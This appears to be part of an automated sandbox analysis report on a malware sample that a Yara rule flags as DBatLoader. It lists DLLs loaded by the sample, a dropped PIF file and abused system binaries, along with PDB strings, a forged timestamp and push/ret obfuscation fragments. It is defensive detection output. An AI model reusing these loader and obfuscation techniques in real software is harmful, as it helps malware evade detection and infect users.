Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: ntasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: D2pQ4J4GGZ.exe, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr
Source:	Binary string: easinvoker.pdbH source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.000000000249D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002180D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002183E000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr

Data Obfuscation

Yara detected DBatLoader

Source: Yara match

File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE

Binary contains a suspicious time stamp

Source: alpha.pif.4.dr

Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029D894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_029D894C

PE file contains sections with non-standard names

Source: alpha.pif.4.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C63B0 push 029C640Bh; ret	0_2_029C6403
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C63AE push 029C640Bh; ret	0_2_029C6403
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CC349 push 8B029CC1h; ret	0_2_029CC34E
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029EC378 push 029EC56Eh; ret	0_2_029EC566
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C6784 push 029C67C6h; ret	0_2_029C67BE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C6782 push 029C67C6h; ret	0_2_029C67BE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A9E716 push ecx; ret	0_2_02A9E729
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A7C446 push ecx; ret	0_2_02A7C459
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029EC570 push 029EC56Eh; ret	0_2_029EC566
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CC56C push ecx; mov dword ptr [esp], edx	0_2_029CC571
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D8AD8 push 029D8B10h; ret	0_2_029D8B08
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DAAE0 push 029DAB18h; ret	0_2_029DAB10
